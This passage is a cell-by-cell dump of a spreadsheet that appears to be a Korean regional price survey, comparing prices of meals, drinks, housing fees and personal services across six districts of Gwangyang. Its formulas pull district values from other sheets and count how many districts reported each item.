=금호동!F36 -> 10,000 | Z36: =금호동!G36 -> 10,000 | AA36: 0
A37: 2 | B37: 냉면 | C37: 물냉면, 1인분(보통) | D37: =COUNTIF(J37,"<>0")+COUNTIF(M37,"<>0")+COUNTIF(P37,"<>0")+COUNTIF(S37,"<>0")+COUNTIF(V37,"<>0")+COUNTIF(Y37,"<>0") -> 6 | E37: 6 | F37: 9,167 | G37: 9,167 | H37: 0 | I37: 0 | J37: =광양읍1!F37 -> 9,500 | K37: =광양읍1!G37 -> 9,500 | L37: 0 | M37: =광양읍2!F37 -> 9,000 | N37: =광양읍2!G37 -> 9,000 | O37: 0 | P37: =중마동1!F37 -> 9,500 | Q37: =중마동1!G37 -> 9,500 | R37: 0 | S37: =중마동2!F37 -> 12,000 | T37: =중마동2!G37 -> 12,000 | U37: 0 | V37: =광영동!F37 -> 7,000 | W37: =광영동!G37 -> 7,000 | X37: 0 | Y37: =금호동!F37 -> 8,000 | Z37: =금호동!G37 -> 8,000 | AA37: 0
A38: 3 | B38: 비빔밥 | C38: 1인분(보통) | D38: 6 | E38: 6 | F38: 7,542 | G38: 7,542 | H38: 0 | I38: 0 | J38: =광양읍1!F38 -> 8,000 | K38: =광양읍1!G38 -> 8,000 | L38: 0 | M38: =광양읍2!F38 -> 8,000 | N38: =광양읍2!G38 -> 8,000 | O38: 0 | P38: =중마동1!F38 -> 7,500 | Q38: =중마동1!G38 -> 7,500 | R38: 0 | S38: =중마동2!F38 -> 7,500 | T38: =중마동2!G38 -> 7,500 | U38: 0 | V38: =광영동!F38 -> 6,750 | W38: =광영동!G38 -> 6,750 | X38: 0 | Y38: =금호동!F38 -> 7,500 | Z38: =금호동!G38 -> 7,500 | AA38: 0
A39: 4 | B39: 갈비탕 | C39: 1인분(보통) | D39: 6 | E39: 6 | F39: 11,917 | G39: 11,917 | H39: 0 | I39: 0 | J39: =광양읍1!F39 -> 13,500 | K39: =광양읍1!G39 -> 13,500 | L39: 0 | M39: =광양읍2!F39 -> 11,500 | N39: =광양읍2!G39 -> 11,500 | O39: 0 | P39: =중마동1!F39 -> 13,500 | Q39: =중마동1!G39 -> 13,500 | R39: 0 | S39: =중마동2!F39 -> 14,000 | T39: =중마동2!G39 -> 14,000 | U39: 0 | V39: =광영동!F39 -> 11,000 | W39: =광영동!G39 -> 11,000 | X39: 0 | Y39: =금호동!F39 -> 8,000 | Z39: =금호동!G39 -> 8,000 | AA39: 0
A40: 5 | B40: 삼계탕 | C40: 1인분(보통) | D40: 6 | E40: 6 | F40: 14,000 | G40: 14,000 | H40: 0 | I40: 0 | J40: =광양읍1!F40 -> 13,500 | K40: =광양읍1!G40 -> 13,500 | L40: 0 | M40: =광양읍2!F40 -> 13,500 | N40: =광양읍2!G40 -> 13,500 | O40: 0 | P40: =중마동1!F40 -> 14,500 | Q40: =중마동1!G40 -> 14,500 | R40: 0 | S40: =중마동2!F40 -> 15,500 | T40: =중마동2!G40 -> 15,500 | U40: 0 | V40: =광영동!F40 -> 14,500 | W40: =광영동!G40 -> 14,500 | X40: 0 | Y40: =금호동!F40 -> 12,500 | Z40: =금호동!G40 -> 12,500 | AA40: 0
A41: 6 | B41: 된장찌개 백반 | C41: 1인분(보통) | D41: 6 | E41: 6 | F41: 7,875 | G41: 7,875 | H41: 0 | I41: 0 | J41: =광양읍1!F41 -> 7,750 | K41: =광양읍1!G41 -> 7,750 | L41: 0 | M41: =광양읍2!F41 -> 8,000 | N41: =광양읍2!G41 -> 8,000 | O41: 0 | P41: =중마동1!F41 -> 8,500 | Q41: =중마동1!G41 -> 8,500 | R41: 0 | S41: =중마동2!F41 -> 8,000 | T41: =중마동2!G41 -> 8,000 | U41: 0 | V41: =광영동!F41 -> 8,000 | W41: =광영동!G41 -> 8,000 | X41: 0 | Y41: =금호동!F41 -> 7,000 | Z41: =금호동!G41 -> 7,000 | AA41: 0
A42: 7 | B42: 김치찌개 백반 | C42: 1인분(보통) | D42: 6 | E42: 6 | F42: 8,125 | G42: 8,125 | H42: 0 | I42: 0 | J42: =광양읍1!F42 -> 7,750 | K42: =광양읍1!G42 -> 7,750 | L42: 0 | M42: =광양읍2!F42 -> 8,500 | N42: =광양읍2!G42 -> 8,500 | O42: 0 | P42: =중마동1!F42 -> 9,000 | Q42: =중마동1!G42 -> 9,000 | R42: 0 | S42: =중마동2!F42 -> 8,000 | T42: =중마동2!G42 -> 8,000 | U42: 0 | V42: =광영동!F42 -> 8,000 | W42: =광영동!G42 -> 8,000 | X42: 0 | Y42: =금호동!F42 -> 7,500 | Z42: =금호동!G42 -> 7,500 | AA42: 0
A43: 8 | B43: 불고기 | C43: 1인분(200g) 공기밥 제외 | D43: 6 | E43: 6 | F43: 23,502 | G43: 23,502 | H43: 0 | I43: 0 | J43: =광양읍1!F43 -> 29,222 | K43: =광양읍1!G43 -> 29,222 | L43: 0 | M43: =광양읍2!F43 -> 27,000 | N43: =광양읍2!G43 -> 27,000 | O43: 0 | P43: =중마동1!F43 -> 21,000 | Q43: =중마동1!G43 -> 21,000 | R43: 0 | S43: =중마동2!F43 -> 23,500 | T43: =중마동2!G43 -> 23,500 | U43: 0 | V43: =광영동!F43 -> 20,290 | W43: =광영동!G43 -> 20,290 | X43: 0 | Y43: =금호동!F43 -> 20,000 | Z43: =금호동!G43 -> 20,000 | AA43: 0
A44: 9 | B44: 등심구이 | C44: 1인분(200g) 공기밥 제외 | D44: 5 | E44: 5 | F44: 40,154 | G44: 40,154 | H44: 0 | I44: 0 | J44: =광양읍1!F44 -> 42,000 | K44: =광양읍1!G44 -> 42,000 | L44: 0 | M44: =광양읍2!F44 -> 46,000 | N44: =광양읍2!G44 -> 46,000 | O44: 0 | P44: =중마동1!F44 -> 38,000 | Q44: =중마동1!G44 -> 38,000 | R44: 0 | S44: =중마동2!F44 -> 40,000 | T44: =중마동2!G44 -> 40,000 | U44: 0 | V44: =광영동!F44 -> 34,770 | W44: =광영동!G44 -> 34,770 | X44: 0 | Y44: =금호동!F44 -> 0 | Z44: =금호동!G44 -> 0 | AA44: 0
A45: 10 | B45: 생선초밥 | C45: 1인분(보통), 활어기준 | D45: 5 | E45: 5 | F45: 15,700 | G45: 15,700 | H45: 0 | I45: 0 | J45: =광양읍1!F45 -> 17,000 | K45: =광양읍1!G45 -> 17,000 | L45: 0 | M45: =광양읍2!F45 -> 17,000 | N45: =광양읍2!G45 -> 17,000 | O45: 0 | P45: =중마동1!F45 -> 12,000 | Q45: =중마동1!G45 -> 12,000 | R45: 0 | S45: =중마동2!F45 -> 17,500 | T45: =중마동2!G45 -> 17,500 | U45: 0 | V45: =광영동!F45 -> 0 | W45: =광영동!G45 -> 0 | X45: 0 | Y45: =금호동!F45 -> 15,000 | Z45: =금호동!G45 -> 15,000 | AA45: 0
A46: 11 | B46: 튀김닭 | C46: 양념통닭 1마리 | D46: 6 | E46: 6 | F46: 18,750 | G46: 18,750 | H46: 0 | I46: 0 | J46: =광양읍1!F46 -> 18,500 | K46: =광양읍1!G46 -> 18,500 | L46: 0 | M46: =광양읍2!F46 -> 18,500 | N46: =광양읍2!G46 -> 18,500 | O46: 0 | P46: =중마동1!F46 -> 18,500 | Q46: =중마동1!G46 -> 18,500 | R46: 0 | S46: =중마동2!F46 -> 19,000 | T46: =중마동2!G46 -> 19,000 | U46: 0 | V46: =광영동!F46 -> 18,000 | W46: =광영동!G46 -> 18,000 | X46: 0 | Y46: =금호동!F46 -> 20,000 | Z46: =금호동!G46 -> 20,000 | AA46: 0
A47: 12 | B47: 칼국수 | C47: 1인분(보통) | D47: 5 | E47: 5 | F47: 7,350 | G47: 7,350 | H47: 0 | I47: 0 | J47: =광양읍1!F47 -> 7,500 | K47: =광양읍1!G47 -> 7,500 | L47: 0 | M47: =광양읍2!F47 -> 7,250 | N47: =광양읍2!G47 -> 7,250 | O47: 0 | P47: =중마동1!F47 -> 7,000 | Q47: =중마동1!G47 -> 7,000 | R47: 0 | S47: =중마동2!F47 -> 7,500 | T47: =중마동2!G47 -> 7,500 | U47: 0 | V47: =광영동!F47 -> 7,500 | W47: =광영동!G47 -> 7,500 | X47: 0 | Y47: =금호동!F47 -> 0 | Z47: =금호동!G47 -> 0 | AA47: 0
A48: 13 | B48: 조리라면 | C48: 분식점 1인분 | D48: 6 | E48: 6 | F48: 4,067 | G48: 4,067 | H48: 0 | I48: 0 | J48: =광양읍1!F48 -> 4,250 | K48: =광양읍1!G48 -> 4,250 | L48: 0 | M48: =광양읍2!F48 -> 4,000 | N48: =광양읍2!G48 -> 4,000 | O48: 0 | P48: =중마동1!F48 -> 3,650 | Q48: =중마동1!G48 -> 3,650 | R48: 0 | S48: =중마동2!F48 -> 4,250 | T48: =중마동2!G48 -> 4,250 | U48: 0 | V48: =광영동!F48 -> 4,000 | W48: =광영동!G48 -> 4,000 | X48: 0 | Y48: =금호동!F48 -> 4,250 | Z48: =금호동!G48 -> 4,250
A49: 14 | B49: 김밥 | C49: 분식점 1인분 | D49: 6 | E49: 6 | F49: 3,400 | G49: 3,400 | H49: 0 | I49: 0 | J49: =광양읍1!F49 -> 3,000 | K49: =광양읍1!G49 -> 3,000 | L49: 0 | M49: =광양읍2!F49 -> 3,250 | N49: =광양읍2!G49 -> 3,250 | O49: 0 | P49: =중마동1!F49 -> 3,750 | Q49: =중마동1!G49 -> 3,750 | R49: 0 | S49: =중마동2!F49 -> 3,500 | T49: =중마동2!G49 -> 3,500 | U49: 0 | V49: =광영동!F49 -> 3,750 | W49: =광영동!G49 -> 3,750 | X49: 0 | Y49: =금호동!F49 -> 3,150 | Z49: =금호동!G49 -> 3,150 | AA49: 0
A50: 15 | B50: 짜장면 | C50: 1인분(보통) | D50: 6 | E50: 6 | F50: 6,242 | G50: 6,242 | H50: 0 | I50: 0 | J50: =광양읍1!F50 -> 6,000 | K50: =광양읍1!G50 -> 6,000 | L50: 0 | M50: =광양읍2!F50 -> 6,000 | N50: =광양읍2!G50 -> 6,000 | O50: 0 | P50: =중마동1!F50 -> 7,000 | Q50: =중마동1!G50 -> 7,000 | R50: 0 | S50: =중마동2!F50 -> 5,450 | T50: =중마동2!G50 -> 5,450 | U50: 0 | V50: =광영동!F50 -> 6,000 | W50: =광영동!G50 -> 6,000 | X50: 0 | Y50: =금호동!F50 -> 7,000 | Z50: =금호동!G50 -> 7,000 | AA50: 0
A51: 16 | B51: 짬뽕 | C51: 1인분(보통) | D51: 6 | E51: 6 | F51: 8,075 | G51: 8,075 | H51: 0 | I51: 0 | J51: =광양읍1!F51 -> 8,000 | K51: =광양읍1!G51 -> 8,000 | L51: 0 | M51: =광양읍2!F51 -> 8,000 | N51: =광양읍2!G51 -> 8,000 | O51: 0 | P51: =중마동1!F51 -> 9,000 | Q51: =중마동1!G51 -> 9,000 | R51: 0 | S51: =중마동2!F51 -> 6,450 | T51: =중마동2!G51 -> 6,450 | U51: 0 | V51: =광영동!F51 -> 8,000 | W51: =광영동!G51 -> 8,000 | X51: 0 | Y51: =금호동!F51 -> 9,000 | Z51: =금호동!G51 -> 9,000 | AA51: 0
A52: 17 | B52: 탕수육 | C52: 일반탕수육(보통) | D52: 6 | E52: 6 | F52: 21,250 | G52: 21,250 | H52: 0 | I52: 0 | J52: =광양읍1!F52 -> 21,000 | K52: =광양읍1!G52 -> 21,000 | L52: 0 | M52: =광양읍2!F52 -> 27,000 | N52: =광양읍2!G52 -> 27,000 | O52: 0 | P52: =중마동1!F52 -> 21,500 | Q52: =중마동1!G52 -> 21,500 | R52: 0 | S52: =중마동2!F52 -> 18,000 | T52: =중마동2!G52 -> 18,000 | U52: 0 | V52: =광영동!F52 -> 17,500 | W52: =광영동!G52 -> 17,500 | X52: 0 | Y52: =금호동!F52 -> 22,500 | Z52: =금호동!G52 -> 22,500 | AA52: 0
A53: 18 | B53: 돈가스 | C53: 일반돈가스,1인분 | D53: 6 | E53: 6 | F53: 8,700 | G53: 8,700 | H53: 0 | I53: 0 | J53: =광양읍1!F53 -> 9,000 | K53: =광양읍1!G53 -> 9,000 | L53: 0 | M53: =광양읍2!F53 -> 10,000 | N53: =광양읍2!G53 -> 10,000 | O53: 0 | P53: =중마동1!F53 -> 9,750 | Q53: =중마동1!G53 -> 9,750 | R53: 0 | S53: =중마동2!F53 -> 7,950 | T53: =중마동2!G53 -> 7,950 | U53: 0 | V53: =광영동!F53 -> 7,000 | W53: =광영동!G53 -> 7,000 | X53: 0 | Y53: =금호동!F53 -> 8,500 | Z53: =금호동!G53 -> 8,500 | AA53: 0
A54: 19 | B54: 햄버거 | C54: 기본형(야채,고기) | D54: 6 | E54: 6 | F54: 3,967 | G54: 3,967 | H54: 0 | I54: 0 | J54: =광양읍1!F54 -> 3,550 | K54: =광양읍1!G54 -> 3,550 | L54: 0 | M54: =광양읍2!F54 -> 4,100 | N54: =광양읍2!G54 -> 4,100 | O54: 0 | P54: =중마동1!F54 -> 3,150 | Q54: =중마동1!G54 -> 3,150 | R54: 0 | S54: =중마동2!F54 -> 4,900 | T54: =중마동2!G54 -> 4,900 | U54: 0 | V54: =광영동!F54 -> 3,500 | W54: =광영동!G54 -> 3,500 | X54: 0 | Y54: =금호동!F54 -> 4,600 | Z54: =금호동!G54 -> 4,600 | AA54: 0
A55: 20 | B55: 피자 | C55: 기본형(야채,고기) | D55: 5 | E55: 5 | F55: 16,620 | G55: 16,620 | H55: 0 | I55: 0 | J55: =광양읍1!F55 -> 18,400 | K55: =광양읍1!G55 -> 18,400 | L55: 0 | M55: =광양읍2!F55 -> 13,900 | N55: =광양읍2!G55 -> 13,900 | O55: 0 | P55: =중마동1!F55 -> 18,950 | Q55: =중마동1!G55 -> 18,950 | R55: 0 | S55: =중마동2!F55 -> 19,900 | T55: =중마동2!G55 -> 19,900 | U55: 0 | V55: =광영동!F55 -> 11,950 | W55: =광영동!G55 -> 11,950 | X55: 0 | Y55: =금호동!F55 -> 0 | Z55: =금호동!G55 -> 0 | AA55: 0
A56: 21 | B56: 커피(외식) | C56: 일반원두커피 | D56: 6 | E56: 6 | F56: 3,225 | G56: 3,225 | H56: 0 | I56: 0 | J56: =광양읍1!F56 -> 3,000 | K56: =광양읍1!G56 -> 3,000 | L56: 0 | M56: =광양읍2!F56 -> 3,150 | N56: =광양읍2!G56 -> 3,150 | O56: 0 | P56: =중마동1!F56 -> 3,250 | Q56: =중마동1!G56 -> 3,250 | R56: 0 | S56: =중마동2!F56 -> 3,350 | T56: =중마동2!G56 -> 3,350 | U56: 0 | V56: =광영동!F56 -> 3,750 | W56: =광영동!G56 -> 3,750 | X56: 0 | Y56: =금호동!F56 -> 2,850 | Z56: =금호동!G56 -> 2,850 | AA56: 0
A57: 22 | B57: 국산차(외식) | C57: 녹차(티백 또는 잎녹차) | D57: 6 | E57: 6 | F57: 3,792 | G57: 3,792 | H57: 0 | I57: 0 | J57: =광양읍1!F57 -> 3,900 | K57: =광양읍1!G57 -> 3,900 | L57: 0 | M57: =광양읍2!F57 -> 4,500 | N57: =광양읍2!G57 -> 4,500 | O57: 0 | P57: =중마동1!F57 -> 3,400 | Q57: =중마동1!G57 -> 3,400 | R57: 0 | S57: =중마동2!F57 -> 3,200 | T57: =중마동2!G57 -> 3,200 | U57: 0 | V57: =광영동!F57 -> 4,000 | W57: =광영동!G57 -> 4,000 | X57: 0 | Y57: =금호동!F57 -> 3,750 | Z57: =금호동!G57 -> 3,750 | AA57: 0
A58: 23 | B58: 삼겹살 | C58: 식육식당 200g(국내산) | D58: 6 | E58: 6 | F58: 14,184 | G58: 14,184 | H58: 0 | I58: 0 | J58: =광양읍1!F58 -> 15,250 | K58: =광양읍1!G58 -> 15,250 | L58: 0 | M58: =광양읍2!F58 -> 15,300 | N58: =광양읍2!G58 -> 15,300 | O58: 0 | P58: =중마동1!F58 -> 15,500 | Q58: =중마동1!G58 -> 15,500 | R58: 0 | S58: =중마동2!F58 -> 15,717 | T58: =중마동2!G58 -> 15,717 | U58: 0 | V58: =광영동!F58 -> 12,340 | W58: =광영동!G58 -> 12,340 | X58: 0 | Y58: =금호동!F58 -> 11,000 | Z58: =금호동!G58 -> 11,000 | AA58: 0
A59: 24 | B59: 돼지갈비 | C59: 식육식당 200g(국내산) | D59: 6 | E59: 6 | F59: 12,333 | G59: 12,333 | H59: 0 | I59: 0 | J59: =광양읍1!F59 -> 14,500 | K59: =광양읍1!G59 -> 14,500 | L59: 0 | M59: =광양읍2!F59 -> 13,000 | N59: =광양읍2!G59 -> 13,000 | O59: 0 | P59: =중마동1!F59 -> 11,500 | Q59: =중마동1!G59 -> 11,500 | R59: 0 | S59: =중마동2!F59 -> 11,500 | T59: =중마동2!G59 -> 11,500 | U59: 0 | V59: =광영동!F59 -> 12,500 | W59: =광영동!G59 -> 12,500 | X59: 0 | Y59: =금호동!F59 -> 11,000 | Z59: =금호동!G59 -> 11,000 | AA59: 0
A60: 25 | B60: 쇠갈비 | C60: 식육식당 200g(국내산) | D60: 3 | E60: 3 | F60: 42,392 | G60: 42,392 | H60: 0 | I60: 0 | J60: =광양읍1!F60 -> 0 | K60: =광양읍1!G60 -> 0 | L60: 0 | M60: =광양읍2!F60 -> 44,925 | N60: =광양읍2!G60 -> 44,925 | O60: 0 | P60: =중마동1!F60 -> 41,000 | Q60: =중마동1!G60 -> 41,000 | R60: 0 | S60: =중마동2!F60 -> 0 | T60: =중마동2!G60 -> 0 | U60: 0 | V60: =광영동!F60 -> 41,250 | W60: =광영동!G60 -> 41,250 | X60: 0 | Y60: =금호동!F60 -> 0 | Z60: =금호동!G60 -> 0 | AA60: 0
A61: 26 | B61: 생맥주 | C61: 500CC 1잔 | D61: 6 | E61: 6 | F61: 3,792 | G61: 3,792 | H61: 0 | I61: 0 | J61: =광양읍1!F61 -> 4,000 | K61: =광양읍1!G61 -> 4,000 | L61: 0 | M61: =광양읍2!F61 -> 4,000 | N61: =광양읍2!G61 -> 4,000 | O61: 0 | P61: =중마동1!F61 -> 3,750 | Q61: =중마동1!G61 -> 3,750 | R61: 0 | S61: =중마동2!F61 -> 3,750 | T61: =중마동2!G61 -> 3,750 | U61: 0 | V61: =광영동!F61 -> 3,500 | W61: =광영동!G61 -> 3,500 | X61: 0 | Y61: =금호동!F61 -> 3,750 | Z61: =금호동!G61 -> 3,750 | AA61: 0
A62: 27 | B62: 공동 주택관리비 | C62: 주공 18평1개월 (공과금 제외) | D62: 6 | E62: 6 | F62: 56,180 | G62: 56,180 | H62: 0 | I62: 0 | J62: =광양읍1!F62 -> 52,000 | K62: =광양읍1!G62 -> 52,000 | L62: 0 | M62: =광양읍2!F62 -> 53,453 | N62: =광양읍2!G62 -> 53,453 | O62: 0 | P62: =중마동1!F62 -> 60,000 | Q62: =중마동1!G62 -> 60,000 | R62: 0 | S62: =중마동2!F62 -> 71,130 | T62: =중마동2!G62 -> 71,130 | U62: 0 | V62: =광영동!F62 -> 61,500 | W62: =광영동!G62 -> 61,500 | X62: 0 | Y62: =금호동!F62 -> 39,000 | Z62: =금호동!G62 -> 39,000 | AA62: 0
A63: 28 | B63: 양 복 세탁료 | C63: 신사복 상·하 드라이크리닝 1회 | D63: 6 | E63: 6 | F63: 8,858 | G63: 8,858 | H63: 0 | I63: 0 | J63: =광양읍1!F63 -> 8,000 | K63: =광양읍1!G63 -> 8,000 | L63: 0 | M63: =광양읍2!F63 -> 8,000 | N63: =광양읍2!G63 -> 8,000 | O63: 0 | P63: =중마동1!F63 -> 10,000 | Q63: =중마동1!G63 -> 10,000 | R63: 0 | S63: =중마동2!F63 -> 9,000 | T63: =중마동2!G63 -> 9,000 | U63: 0 | V63: =광영동!F63 -> 12,000 | W63: =광영동!G63 -> 12,000 | X63: 0 | Y63: =금호동!F63 -> 6,150 | Z63: =금호동!G63 -> 6,150 | AA63: 0
A64: 29 | B64: 의복수선료 | C64: 신사복 바지 밑단줄임 1회 | D64: 6 | E64: 6 | F64: 4,917 | G64: 4,917 | H64: 0 | I64: 0 | J64: =광양읍1!F64 -> 4,500 | K64: =광양읍1!G64 -> 4,500 | L64: 0 | M64: =광양읍2!F64 -> 5,000 | N64: =광양읍2!G64 -> 5,000 | O64: 0 | P64: =중마동1!F64 -> 6,000 | Q64: =중마동1!G64 -> 6,000 | R64: 0 | S64: =중마동2!F64 -> 4,500 | T64: =중마동2!G64 -> 4,500 | U64: 0 | V64: =광영동!F64 -> 6,000 | W64: =광영동!G64 -> 6,000 | X64: 0 | Y64: =금호동!F64 -> 3,500 | Z64: =금호동!G64 -> 3,500 | AA64: 0
A65: 30 | B65: 영화관람요 (방화. 외화) | C65: 상영시간 100분정도 1회 (입장세,문예진흥기금포함) | D65: 2 | E65: 2 | F65: 13,500 | G65: 13,500 | H65: 0 | I65: 0 | J65: =광양읍1!F65 -> 13,000 | K65: =광양읍1!G65 -> 13,000 | L65: 0 | M65: =광양읍2!F65 -> 0 | N65: =광양읍2!G65 -> 0 | O65: 0 | P65: =중마동1!F65 -> 0 | Q65: =중마동1!G65 -> 0 | R65: 0 | S65: =중마동2!F65 -> 0 | T65: =중마동2!G65 -> 0 | U65: 0 | V65: =광영동!F65 -> 0 | W65: =광영동!G65 -> 0 | X65: 0 | Y65: =금호동!F65 -> 14,000 | Z65: =금호동!G65 -> 14,000 | AA65: 0
A66: 31 | B66: 경기장 입장료 | C66: 공공체육시설 (성인 1인) | D66: 1 | E66: 1 | F66: 10,000 | G66: 10,000 | H66: 0 | I66: 0 | J66: =광양읍1!F66 -> 0 | K66: =광양읍1!G66 -> 0 | L66: 0 | M66: =광양읍2!F66 -> 0 | N66: =광양읍2!G66 -> 0 | O66: 0 | P66: =중마동1!F66 -> 0 | Q66: =중마동1!G66 -> 0 | R66: 0 | S66: =중마동2!F66 -> 0 | T66: =중마동2!G66 -> 0 | U66: 0 | V66: =광영동!F66 -> 0 | W66: =광영동!G66 -> 0 | X66: 0 | Y66: =금호동!F66 -> 10,000 | Z66: =금호동!G66 -> 10,000 | AA66: 0
A67: 32 | B67: 수영장 이용료 | C67: 일반성인 1회 (체육기금 포함) | D67: 1 | E67: 1 | F67: 3,500 | G67: 3,500 | H67: 0 | I67: 0 | J67: =광양읍1!F67 -> 3,500 | K67: =광양읍1!G67 -> 3,500 | L67: 0 | M67: =광양읍2!F67 -> 0 | N67: =광양읍2!G67 -> 0 | O67: 0 | P67: =중마동1!F67 -> 0 | Q67: =중마동1!G67 -> 0 | R67: 0 | S67: =중마동2!F67 -> 0 | T67: =중마동2!G67 -> 0 | U67: 0 | V67: =광영동!F67 -> 0 | W67: =광영동!G67 -> 0 | X67: 0 | Y67: =금호동!F67 -> 0 | Z67: =금호동!G67 -> 0 | AA67: 0
A68: 33 | B68: 볼링장 이용료 | C68: 일반성인 평일오후 1게임 | D68: 3 | E68: 3 | F68: 3,333 | G68: 3,333 | H68: 0 | I68: 0 | J68: =광양읍1!F68 -> 4,000 | K68: =광양읍1!G68 -> 4,000 | L68: 0 | M68: =광양읍2!F68 -> 2,000 | N68: =광양읍2!G68 -> 2,000 | O68: 0 | P68: =중마동1!F68 -> 0 | Q68: =중마동1!G68 -> 0 | R68: 0 | S68: =중마동2!F68 -> 4,000 | T68: =중마동2!G68 -> 4,000 | U68: 0 | V68: =광영동!F68 -> 0 | W68: =광영동!G68 -> 0 | X68: 0 | Y68: =금호동!F68 -> 0 | Z68: =금호동!G68 -> 0 | AA68: 0
A69: 34 | B69: 골프연습장 이용료 | C69: 초급(남자회원)1개월 (레슨비 미포함) | D69: 6 | E69: 6 | F69: 142,500 | G69: 142,500 | H69: 0 | I69: 0 | J69: =광양읍1!F69 -> 100,000 | K69: =광양읍1!G69 -> 100,000 | L69: 0 | M69: =광양읍2!F69 -> 75,000 | N69: =광양읍2!G69 -> 75,000 | O69: 0 | P69: =중마동1!F69 -> 150,000 | Q69: =중마동1!G69 -> 150,000 | S69: =중마동2!F69 -> 225,000 | T69: =중마동2!G69 -> 225,000 | U69: 0 | V69: =광영동!F69 -> 175,000 | W69: =광영동!G69 -> 175,000 | X69: 0 | Y69: =금호동!F69 -> 130,000 | Z69: =금호동!G69 -> 130,000 | AA69: 0
A70: 35 | B70: 노래방 이용료 | C70: 일반인 저녁 1시간 | D70: 6 | E70: 6 | F70: 22,500 | G70: 22,500 | H70: 0 | I70: 0 | J70: =광양읍1!F70 -> 25,000 | K70: =광양읍1!G70 -> 25,000 | L70: 0 | M70: =광양읍2!F70 -> 25,000 | N70: =광양읍2!G70 -> 25,000 | O70: 0 | P70: =중마동1!F70 -> 25,000 | Q70: =중마동1!G70 -> 25,000 | R70: 0 | S70: =중마동2!F70 -> 20,000 | T70: =중마동2!G70 -> 20,000 | U70: 0 | V70: =광영동!F70 -> 25,000 | W70: =광영동!G70 -> 25,000 | X70: 0 | Y70: =금호동!F70 -> 15,000 | Z70: =금호동!G70 -> 15,000 | AA70: 0
A71: 36 | B71: 당구장 이용료 | C71: 큐선대 일반인 저녁 1시간 | D71: 6 | E71: 6 | F71: 9,667 | G71: 9,667 | H71: 0 | I71: 0 | J71: =광양읍1!F71 -> 9,000 | K71: =광양읍1!G71 -> 9,000 | L71: 0 | M71: =광양읍2!F71 -> 10,900 | N71: =광양읍2!G71 -> 10,900 | O71: 0 | P71: =중마동1!F71 -> 10,400 | Q71: =중마동1!G71 -> 10,400 | R71: 0 | S71: =중마동2!F71 -> 10,000 | T71: =중마동2!G71 -> 10,000 | U71: 0 | V71: =광영동!F71 -> 10,500 | W71: =광영동!G71 -> 10,500 | X71: 0 | Y71: =금호동!F71 -> 7,200 | Z71: =금호동!G71 -> 7,200 | AA71: 0
A72: 37 | B72: 사진촬영료 | C72: 칼라 반명함 1조 (상급사진관 3x4) | D72: 6 | E72: 6 | F72: 18,000 | G72: 18,000 | H72: 0 | I72: 0 | J72: =광양읍1!F72 -> 22,500 | K72: =광양읍1!G72 -> 22,500 | L72: 0 | M72: =광양읍2!F72 -> 18,500 | N72: =광양읍2!G72 -> 18,500 | O72: 0 | P72: =중마동1!F72 -> 15,000 | Q72: =중마동1!G72 -> 15,000 | R72: 0 | S72: =중마동2!F72 -> 19,000 | T72: =중마동2!G72 -> 19,000 | U72: 0 | V72: =광영동!F72 -> 18,000 | W72: =광영동!G72 -> 18,000 | X72: 0 | Y72: =금호동!F72 -> 15,000 | Z72: =금호동!G72 -> 15,000 | AA72: 0
A73: 38 | B73: 사진인화료 | C73: 디지털사진인화요금, 현상료 포함 | D73: 6 | E73: 6 | F73: 625 | G73: 625 | H73: 0 | I73: 0 | J73: =광양읍1!F73 -> 400 | K73: =광양읍1!G73 -> 400 | L73: 0 | M73: =광양읍2!F73 -> 400 | N73: =광양읍2!G73 -> 400 | O73: 0 | P73: =중마동1!F73 -> 300 | Q73: =중마동1!G73 -> 300 | R73: 0 | S73: =중마동2!F73 -> 400 | T73: =중마동2!G73 -> 400 | U73: 0 | V73: =광영동!F73 -> 2,000 | W73: =광영동!G73 -> 2,000 | X73: 0 | Y73: =금호동!F73 -> 250 | Z73: =금호동!G73 -> 250 | AA73: 0
A74: 39 | B74: 영상매체대여료 | C74: 최신판 영화 DVD대여요금 | D74: 0 | E74: 0 | F74: 0 | G74: 0 | H74: 0 | I74: 0 | J74: =광양읍1!F74 -> 0 | K74: =광양읍1!G74 -> 0 | L74: 0 | M74: =광양읍2!F74 -> 0 | N74: =광양읍2!G74 -> 0 | O74: 0 | P74: =중마동1!F74 -> 0 | Q74: =중마동1!G74 -> 0 | R74: 0 | S74: =중마동2!F74 -> 0 | T74: =중마동2!G74 -> 0 | U74: 0 | V74: =광영동!F74 -> 0 | W74: =광영동!G74 -> 0 | X74: 0 | Y74: =금호동!F74 -> 0 | Z74: =금호동!G74 -> 0 | AA74: 0
A75: 40 | B75: 이용료(컷트) | C75: 성인조발 중류급 1회 | D75: 6 | E75: 6 | F75: 15,167 | G75: 15,167 | H75: 0 | I75: 0 | J75: =광양읍1!F75 -> 15,000 | K75: =광양읍1!G75 -> 15,000 | L75: 0 | M75: =광양읍2!F75 -> 13,500 | N75: =광양읍2!G75 -> 13,500 | O75: 0 | P75: =중마동1!F75 -> 18,000 | Q75: =중마동1!G75 -> 18,000 | R75: 0 | S75: =중마동2!F75 -> 14,000 | T75: =중마동2!G75 -> 14,000 | U75: 0 | V75: =광영동!F75 -> 17,500 | W75: =광영동!G75 -> 17,500 | X75: 0 | Y75: =금호동!F75 -> 13,000 | Z75: =금호동!G75 -> 13,000 | AA75: 0
A76: 41 | B76: 미용료 | C76: 성인여자 파마(일반) | D76: 6 | E76: 6 | F76: 43,750 | G76: 43,750 | H76: 0 | I76: 0 | J76: =광양읍1!F76 -> 45,000 | K76: =광양읍1!G76 -> 45,000 | L76: 0 | M76: =광양읍2!F76 -> 32,500 | N76: =광양읍2!G76 -> 32,500 | O76: 0 | P76: =중마동1!F76 -> 42,500 | Q76: =중마동1!G76 -> 42,500 | R76: 0 | S76: =중마동2!F76 -> 32,500 | T76: =중마동2!G76 -> 32,500 | U76: 0 | V76: =광영동!F76 -> 60,000 | W76: =광영동!G76 -> 60,000 | X76: 0 | Y76: =금호동!F76 -> 50,000 | Z76: =금호동!G76 -> 50,000 | AA76: 0
